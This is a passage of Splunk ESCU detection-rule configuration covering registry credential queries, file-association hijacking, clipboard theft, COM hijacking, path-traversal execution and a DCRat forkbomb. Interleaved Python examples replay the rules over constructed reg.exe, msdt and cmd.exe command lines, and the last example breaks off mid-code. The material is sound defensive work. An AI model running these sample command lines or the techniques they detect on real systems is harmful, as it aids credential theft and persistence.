Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_cached_domain_credentials_reg_query_filter` [ESCU - Windows Change Default File Association For No File Ext - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects a suspicious process command line that sets or changes the default file association of a file type with no file extension to notepad.exe. This technique was seen in some APT activity and in the Prestige ransomware, which set or modified the default process used to open a file association (for example, .txt to notepad.exe). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects a suspicious process command line that sets or changes the default file association of a file type with no file extension to notepad.exe. This technique was seen in some APT activity and in the Prestige ransomware, which set or modified the default process used to open a file association (for example, .txt to notepad.exe). action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model.
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Change Default File Association For No File Ext - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = A process with command line $process$ set or changed the file association of a file with no file extension on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Change Default File Association For No File Ext - Rule action.correlationsearch.annotations = {"analytic_story": ["Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects a suspicious process command line that sets or changes the default file association of a file type with no file extension to notepad.exe. This technique was seen in some APT activity and in the Prestige ransomware, which set or modified the default process used to open a file association (for example, .txt to notepad.exe).
action.notable.param.rule_title = Windows Change Default File Association For No File Ext action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process="* add *" AND Processes.process="* HKCR\\*" AND Processes.process="*\\shell\\open\\command*" AND Processes.process= *Notepad.exe* by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | rex field=process "Notepad\.exe (?<file_name_association>.*$)" | rex field=file_name_association "\.(?<extension>[^\.]*$)" | where isnull(extension) and isnotnull(file_name_association) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_change_default_file_association_for_no_file_ext_filter` [ESCU - Windows ClipBoard Data via Get-ClipBoard - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a PowerShell script command that retrieves clipboard data. This technique was seen in several post-exploitation tools, such as WinPEAS, to steal sensitive information saved in the clipboard. Using the Get-Clipboard PowerShell cmdlet, adversaries can collect data stored in the clipboard, which may be a copied user name, password or other sensitive information.
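Two of the searches above key on reg.exe command lines: the Cached Domain Credentials Reg Query rule (a `reg query` of CachedLogonsCount under the Winlogon key) and the Change Default File Association For No File Ext rule (a `reg add` under `HKCR\...\shell\open\command` whose data names Notepad.exe, kept only when the text after `Notepad.exe ` carries no `.extension`). The following is an added Python example, not code from the Splunk security_content project: a small reg.exe command-line parser, and both rules' logic run over constructed command lines. The `process_reg` macro is not shown on the page, so the assumption here is that it selects reg.exe invocations; the sample command lines are invented.

```python
"""Added example (not part of splunk/security_content): parses reg.exe
command lines and reproduces the match logic of the Cached Domain
Credentials Reg Query and Change Default File Association For No File Ext
searches over constructed samples."""
import re
import shlex
from typing import Optional

WINLOGON = r"\software\microsoft\windows nt\currentversion\winlogon"

# The two rex stages of the file-association search, verbatim. Splunk's rex
# is case-sensitive unless the pattern starts with (?i), and so are these.
ASSOC_RE = re.compile(r"Notepad\.exe (?P<file_name_association>.*$)")
EXT_RE = re.compile(r"\.(?P<extension>[^\.]*$)")


def parse_reg(process: str) -> Optional[dict]:
    """Split 'reg <verb> <key> [/v NAME | /ve] [/d DATA] ...' into fields.
    Returns None for anything that is not a reg / reg.exe invocation
    (assumed to be what the `process_reg` macro selects)."""
    try:
        argv = shlex.split(process, posix=False)  # keeps backslashes literal
    except ValueError:
        return None
    if len(argv) < 3:
        return None
    exe = argv[0].strip('"').lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe"):
        return None
    out = {"verb": argv[1].lower(), "key": argv[2].strip('"'),
           "value_name": None, "data": None}
    i = 3
    while i < len(argv):
        a = argv[i].lower()
        if a == "/ve":
            out["value_name"] = ""            # the (Default) value
        elif a == "/v" and i + 1 < len(argv):
            i += 1
            out["value_name"] = argv[i].strip('"')
        elif a == "/d" and i + 1 < len(argv):
            i += 1
            out["data"] = argv[i].strip('"')
        i += 1
    return out


def cached_logons_query(process: str) -> bool:
    """Cached Domain Credentials Reg Query: a reg query against the Winlogon
    key that names CachedLogonsCount anywhere on the command line."""
    r = parse_reg(process)
    return bool(r and r["verb"] == "query" and WINLOGON in r["key"].lower()
                and "cachedlogonscount" in process.lower())


def no_ext_association(process: str) -> Optional[str]:
    """Change Default File Association For No File Ext: returns the captured
    file_name_association when the event would survive the search's where
    clause, else None."""
    p = process.lower()
    if not (" add " in p and " hkcr\\" in p
            and "\\shell\\open\\command" in p and "notepad.exe" in p):
        return None                       # tstats where-clause (assumed case-insensitive)
    m = ASSOC_RE.search(process)          # rex #1, case-sensitive
    if not m:
        return None                       # file_name_association is null
    assoc = m.group("file_name_association")
    if EXT_RE.search(assoc):
        return None                       # extension is not null
    return assoc


# Constructed command lines, not from real telemetry.
SAMPLES = [
    r'reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT',
    r'reg add HKCR\enc\shell\open\command /ve /t REG_SZ /d "C:\Windows\Notepad.exe enc" /f',
    r'reg add HKCR\txtfile\shell\open\command /ve /d "C:\Windows\Notepad.exe file.txt" /f',
    r'reg add HKCR\enc\shell\open\command /ve /d "C:\Windows\notepad.exe %1" /f',
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(parse_reg(cmd), cached_logons_query(cmd), no_ext_association(cmd))
```

The fourth sample is the caveat a practitioner should know about the file-association search: because the first `rex` is case-sensitive, a command line that spells `notepad.exe` in lower case yields a null `file_name_association` and is dropped by the `where` clause even though the tstats filter selected it. Prefixing the rex pattern with `(?i)` closes that gap.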
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a PowerShell script command that retrieves clipboard data. This technique was seen in several post-exploitation tools, such as WinPEAS, to steal sensitive information saved in the clipboard. Using the Get-Clipboard PowerShell cmdlet, adversaries can collect data stored in the clipboard, which may be a copied user name, password or other sensitive information. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = It is possible there will be false positives; filter as needed. action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows ClipBoard Data via Get-ClipBoard - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = PowerShell script $ScriptBlockText$ executed the Get-Clipboard cmdlet on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows ClipBoard Data 
via Get-ClipBoard - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-Clipboard*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_clipboard_data_via_get_clipboard_filter` [ESCU - Windows COM Hijacking InprocServer32 Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of reg.exe performing an add to the InProcServer32, which may be related to COM hijacking. Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of reg.exe performing an add to the InProcServer32, which may be related to COM hijacking. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and some filtering may be required. 
action.escu.creation_date = 2022-09-26
action.escu.modification_date = 2022-09-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows COM Hijacking InprocServer32 Modification - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to modify InProcServer32 within the registry.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows COM Hijacking InprocServer32 Modification - Rule
action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of reg.exe adding a value under an InProcServer32 registry key, which may be related to COM hijacking. Adversaries can use the COM system to insert malicious code that is executed in place of legitimate software by hijacking COM references and relationships as a means of persistence. Hijacking a COM object requires a change in the registry that replaces a reference to a legitimate system component, which may cause that component to stop working when executed. When that system component is executed through normal system operation, the adversary's code is executed instead.
action.notable.param.rule_title = Windows COM Hijacking InprocServer32 Modification
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` Processes.process=*inprocserver32* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_com_hijacking_inprocserver32_modification_filter`

[ESCU - Windows Command and Scripting Interpreter Hunting Path Traversal - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies path traversal in command-line executions and should be used to tune and drive other, higher-fidelity analytics. This technique was seen in malicious documents that executed malicious code through msdt.exe, using path traversal as a defense evasion technique. This hunting query is a good pivot for finding suspicious processes and command lines that use path traversal to run malicious code, and may help you find downloaded malware or other LOLBin execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies path traversal in command-line executions and should be used to tune and drive other, higher-fidelity analytics. This technique was seen in malicious documents that executed malicious code through msdt.exe, using path traversal as a defense evasion technique. This hunting query is a good pivot for finding suspicious processes and command lines that use path traversal to run malicious code, and may help you find downloaded malware or other LOLBin execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives vary with the threshold you choose: the higher the required count of path traversal strings, the fewer false positives.
action.escu.creation_date = 2022-06-01
action.escu.modification_date = 2022-06-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Command and Scripting Interpreter Hunting Path Traversal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Command and Scripting Interpreter Hunting Path Traversal - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes by Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval count_of_pattern1 = (mvcount(split(process,"/.."))-1) | eval count_of_pattern2 = (mvcount(split(process,"\.."))-1) | eval count_of_pattern3 = (mvcount(split(process,"\\.."))-1) | eval count_of_pattern4 = (mvcount(split(process,"//.."))-1) | search count_of_pattern1 > 1 OR count_of_pattern2 > 1 OR count_of_pattern3 > 1 OR count_of_pattern4 > 1 | `windows_command_and_scripting_interpreter_hunting_path_traversal_filter`

[ESCU - Windows Command and Scripting Interpreter Path Traversal Exec - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies path traversal in command-line executions. This technique was seen in malicious documents that executed malicious code through msdt.exe, using path traversal as a defense evasion technique. This TTP is a good pivot for finding more suspicious processes and command lines that run before and after this execution, and may help you find downloaded malware or other LOLBin execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies path traversal in command-line executions. This technique was seen in malicious documents that executed malicious code through msdt.exe, using path traversal as a defense evasion technique. This TTP is a good pivot for finding more suspicious processes and command lines that run before and after this execution, and may help you find downloaded malware or other LOLBin execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Not known at this moment.
action.escu.creation_date = 2022-06-01
action.escu.modification_date = 2022-06-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Command and Scripting Interpreter Path Traversal Exec - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"]
action.risk = 1
action.risk.param._risk_message = A parent process $parent_process_name$ has spawned a child $process_name$ with path traversal command line $process$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Command and Scripting Interpreter Path Traversal Exec - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies path traversal in command-line executions. This technique was seen in malicious documents that executed malicious code through msdt.exe, using path traversal as a defense evasion technique. This TTP is a good pivot for finding more suspicious processes and command lines that run before and after this execution, and may help you find downloaded malware or other LOLBin execution.
action.notable.param.rule_title = Windows Command and Scripting Interpreter Path Traversal Exec
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process="*\/..\/..\/..\/*" OR Processes.process="*\\..\\..\\..\\*" OR Processes.process="*\/\/..\/\/..\/\/..\/\/*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_command_and_scripting_interpreter_path_traversal_exec_filter`

[ESCU - Windows Command Shell DCRat ForkBomb Payload - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the DCRat "forkbomb" payload feature. This technique was seen in the DarkCrystal RAT backdoor, which spawns several cmd.exe child processes that each execute "notepad.exe & pause". The analytic detects multiple cmd.exe processes, launched from a batch script, spawning notepad.exe child processes on the targeted host within a 30-second window. This TTP can be a good pivot for investigating a DCRat infection.
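The two path traversal analytics above differ only in their thresholds: the hunting rule counts each separator/dot-dot pattern with `mvcount(split(...)) - 1` and keeps any command line where one count exceeds 1, while the exec rule requires three consecutive traversals. The Python below is an added example, not code from Splunk or the security_content project; it reimplements both checks over a handful of constructed process events (the command lines, hosts and users are illustrative, not captured from malware) so the difference in fidelity between the two rules can be seen on concrete input.

```python
"""Path traversal scoring over process command lines (constructed sample events).

Mirrors the two ESCU analytics: the hunting rule counts each traversal pattern and keeps
rows where any count exceeds 1; the exec rule looks for three consecutive traversals such
as /../../../ or \\..\\..\\..\\ (added example, not the project's own code).
"""
from dataclasses import dataclass

# The four separator/dot-dot patterns the hunting search splits on.
TRAVERSAL_PATTERNS = ("/..", "\\..", "\\\\..", "//..")
# Three-deep traversal strings matched by the exec rule's wildcard patterns.
EXEC_PATTERNS = ("/../../../", "\\..\\..\\..\\", "//..//..//..//")
HUNTING_THRESHOLD = 1  # the search keeps rows with count_of_patternN > 1


@dataclass
class ProcessEvent:
    dest: str
    user: str
    parent_process_name: str
    process_name: str
    process: str  # full command line (Processes.process)


def traversal_counts(cmdline: str) -> dict:
    """Occurrences of each traversal pattern, equivalent to mvcount(split(...)) - 1."""
    return {pattern: cmdline.count(pattern) for pattern in TRAVERSAL_PATTERNS}


def hunting_match(cmdline: str) -> bool:
    """Hunting rule: any traversal pattern seen more than HUNTING_THRESHOLD times."""
    return any(n > HUNTING_THRESHOLD for n in traversal_counts(cmdline).values())


def exec_match(cmdline: str) -> bool:
    """Exec (notable) rule: a run of at least three consecutive traversals."""
    return any(p in cmdline for p in EXEC_PATTERNS)


def evaluate(events):
    """One result row per event with both verdicts, so the rules can be compared."""
    rows = []
    for ev in events:
        rows.append({
            "dest": ev.dest,
            "process_name": ev.process_name,
            "counts": traversal_counts(ev.process),
            "hunting": hunting_match(ev.process),
            "exec": exec_match(ev.process),
        })
    return rows


# Constructed sample events; hosts, users and command lines are illustrative only.
SAMPLE_EVENTS = [
    # two traversals in an msdt.exe argument: hunting fires, exec does not
    ProcessEvent("ws01", "alice", "winword.exe", "msdt.exe",
                 r'msdt.exe /id PCWDiagnostic /param "IT_BrowseForFile=/../../tmp/x.txt"'),
    # four backslash traversals: both rules fire
    ProcessEvent("ws01", "alice", "cmd.exe", "cmd.exe",
                 r"cmd.exe /c ..\..\..\..\Windows\System32\calc.exe"),
    # doubled forward slashes, the exec rule's third pattern: both rules fire
    ProcessEvent("ws02", "bob", "explorer.exe", "rundll32.exe",
                 r"rundll32.exe //..//..//..//Windows//System32//x.dll,Entry"),
    # a lone "../" with no separator before the dots: neither rule fires
    ProcessEvent("ws02", "bob", "code.exe", "python.exe",
                 "python.exe -c \"open('../config.yaml')\""),
]

if __name__ == "__main__":
    for row in evaluate(SAMPLE_EVENTS):
        print(row)
```

The fourth event shows why the hunting rule splits on separator-plus-dots rather than on `..` alone: a relative path at the start of an argument is everyday developer activity and would otherwise dominate the results.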
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the DCRat "forkbomb" payload feature. This technique was seen in the DarkCrystal RAT backdoor, which spawns several cmd.exe child processes that each execute "notepad.exe & pause". The analytic detects multiple cmd.exe processes, launched from a batch script, spawning notepad.exe child processes on the targeted host within a 30-second window. This TTP can be a good pivot for investigating a DCRat infection.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2022-07-28
action.escu.modification_date = 2022-07-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Command Shell DCRat ForkBomb Payload - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DarkCrystal RAT"]
action.risk = 1
action.risk.param._risk_message = Multiple cmd.exe processes with child process notepad.exe executed on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Command Shell DCRat ForkBomb Payload - Rule
action.correlationsearch.annotations = {"analytic_story": ["DarkCrystal RAT"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the DCRat "forkbomb" payload feature. This technique was seen in the DarkCrystal RAT backdoor, which spawns several cmd.exe child processes that each execute "notepad.exe & pause". The analytic detects multiple cmd.exe processes, launched from a batch script, spawning notepad.exe child processes on the targeted host within a 30-second window. This TTP can be a good pivot for investigating a DCRat infection.
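The forkbomb search below is a windowed distinct-count: it buckets matching process events into 30-second spans (`_time span=30s`) per host and user and alerts only when at least 10 distinct parent and 10 distinct child process IDs appear in one span. The Python that follows is an added example, not Splunk's or the project's own code; it reimplements that logic over constructed telemetry (a 12-way burst on one host and three ordinary launches on another) so the threshold behaviour is visible without a Splunk instance.

```python
"""DCRat forkbomb detection over constructed process events (added example).

Within 30-second buckets, cmd.exe parents launched from a .bat file that spawn
notepad.exe are counted; an alert needs >= 10 distinct parent and child process IDs.
"""
from collections import defaultdict
from dataclasses import dataclass

SPAN_SECONDS = 30      # matches "_time span=30s" in the tstats by-clause
MIN_DISTINCT_IDS = 10  # matches "parent_process_id_count >= 10 AND process_id_count >= 10"


@dataclass
class ProcessEvent:
    time: float                # epoch seconds (_time)
    dest: str
    user: str
    parent_process_name: str
    parent_process: str        # parent command line
    parent_process_id: int
    process_name: str
    original_file_name: str
    process_id: int
    process: str


def matches_filter(ev: ProcessEvent) -> bool:
    """The tstats where-clause: cmd.exe parent launched from a .bat, notepad.exe child."""
    return (ev.parent_process_name.lower() == "cmd.exe"
            and (ev.process_name.lower() == "notepad.exe"
                 or ev.original_file_name.lower() == "notepad.exe")
            and ".bat" in ev.parent_process.lower())


def detect(events):
    """Group by host, user and 30s bucket; return buckets meeting the distinct-id threshold."""
    buckets = defaultdict(lambda: {"parent_ids": set(), "child_ids": set(),
                                   "first": None, "last": None})
    for ev in events:
        if not matches_filter(ev):
            continue
        bucket_start = int(ev.time // SPAN_SECONDS) * SPAN_SECONDS
        b = buckets[(ev.dest, ev.user, bucket_start)]
        b["parent_ids"].add(ev.parent_process_id)
        b["child_ids"].add(ev.process_id)
        b["first"] = ev.time if b["first"] is None else min(b["first"], ev.time)
        b["last"] = ev.time if b["last"] is None else max(b["last"], ev.time)
    alerts = []
    for (dest, user, start), b in sorted(buckets.items()):
        if len(b["parent_ids"]) >= MIN_DISTINCT_IDS and len(b["child_ids"]) >= MIN_DISTINCT_IDS:
            alerts.append({"dest": dest, "user": user, "bucket_start": start,
                           "parent_process_id_count": len(b["parent_ids"]),
                           "process_id_count": len(b["child_ids"]),
                           "firstTime": b["first"], "lastTime": b["last"]})
    return alerts


def build_sample_events():
    """Constructed telemetry: a 12-way forkbomb on ws01 and three benign launches on ws02."""
    base = 1_700_000_010.0  # aligned to a 30s boundary so the burst lands in one bucket
    events = []
    for i in range(12):
        events.append(ProcessEvent(base + i * 0.5, "ws01", "alice", "cmd.exe",
                                   r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\run.bat"',
                                   4000 + i, "notepad.exe", "NOTEPAD.EXE", 5000 + i,
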